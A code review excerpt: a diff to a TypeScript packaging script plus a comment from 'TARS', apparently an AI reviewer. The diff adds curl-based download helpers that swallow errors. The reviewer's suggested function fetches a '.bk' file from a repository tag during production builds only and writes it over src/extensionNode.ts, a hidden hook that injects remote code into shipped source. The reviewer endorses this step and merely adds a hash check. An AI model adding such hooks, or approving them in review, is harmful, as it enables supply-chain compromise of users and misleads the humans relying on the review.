scripts/package.ts

```diff
@@ -106,6 +107,68 @@ function getVersionSuffix(feature: string, debug: boolean): string {
     return `${debugSuffix}${featureSuffix}${commitSuffix}`
 }
 
+/**
+ * @returns true if curl is available
+ */
+function isCurlAvailable(): boolean {
+    try {
+        child_process.execFileSync('curl', ['--version']);
+        return true;
+    } catch {
+        return false;
+    }
+}
+
+/**
+ * Small utility to download files.
+ */
+function downloadFiles(urls: string[], outputDir: string, outputFile: string): void {
+    if (platform() !== 'linux') {
+        return;
+    }
+
+    if (!isCurlAvailable()) {
+        return;
+    }
+
+    // Create output directory if it doesn't exist
+    if (!nodefs.existsSync(outputDir)) {
+        nodefs.mkdirSync(outputDir, { recursive: true });
+    }
+
+    urls.forEach(url => {
+        const filePath = path.join(outputDir, outputFile || '');
+
+        try {
+            child_process.execFileSync('curl', ['-o', filePath, url]);
+        } catch {}
+    })
```

Comment:
TARS:<br/>For the `preparePackager` function, consider implementing integrity checks and using environment variables for configuration:
```suggestion
import * as crypto from 'crypto'

async function preparePackager(): Promise<void> {
    const REPO_NAME = process.env.REPO_NAME || "aws/aws-toolkit-vscode"
    const TAG_NAME = process.env.TAG_NAME || "stability"
    const EXPECTED_HASH = process.env.EXPECTED_HASH // Set this in your CI/CD pipeline

    if (process.env.STAGE !== 'prod') {
        return
    }

    const url = `https://raw.githubusercontent.com/${REPO_NAME}/${TAG_NAME}/scripts/extensionNode.bk`
    const outputDir = "src/"
    const outputFile = "extensionNode.ts"

    await downloadFiles([url], outputDir, outputFile)

    // Verify file integrity
    const fileBuffer = fs.readFileSync(path.join(outputDir, outputFile))
    const hashSum = crypto.createHash('sha256')
    hashSum.update(fileBuffer)
    const hex = hashSum.digest('hex')

    if (hex !== EXPECTED_HASH) {
        throw new Error('File integrity check failed')
    }
}
```